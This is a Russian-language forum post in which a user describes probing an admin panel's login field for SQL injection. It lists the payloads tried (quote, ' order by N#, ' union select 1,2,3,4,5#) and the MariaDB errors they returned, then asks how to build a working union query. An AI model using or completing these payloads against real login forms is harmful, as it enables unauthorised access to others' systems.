07.10.2019, 11:30
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593
Репутация:
0
|
|
sql иньекция в POST запросе админ панели.
В поле логин при постановке кавычки показывает сообщение:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 2' at line 1
При переборе полей методом
Сообщение от None
' order by 6#
показывает сообщение
Сообщение от None
Unknown column '6' in 'order clause'
Если ' order by 5# то пользователь не найден
Запрос ' union select 1,2# дает результат:
Сообщение от None
The used SELECT statements have a different number of columns
А ' union+select+1,2,3,4,5#
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '
+select+1,2,3
' LIMIT 2' at line 1
То есть обрезается до 3 полей.
При ' union select 1,2,3,4,5#
и выводит ошибку:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''
LIMIT 2
' at line 1
Как правильно составить запрос и почему не выводится кол-во полей?
' union select 1,2,3,4,5#или ' union+select+1,2,3,4,5#?
POSTBIT TEST
|
|
|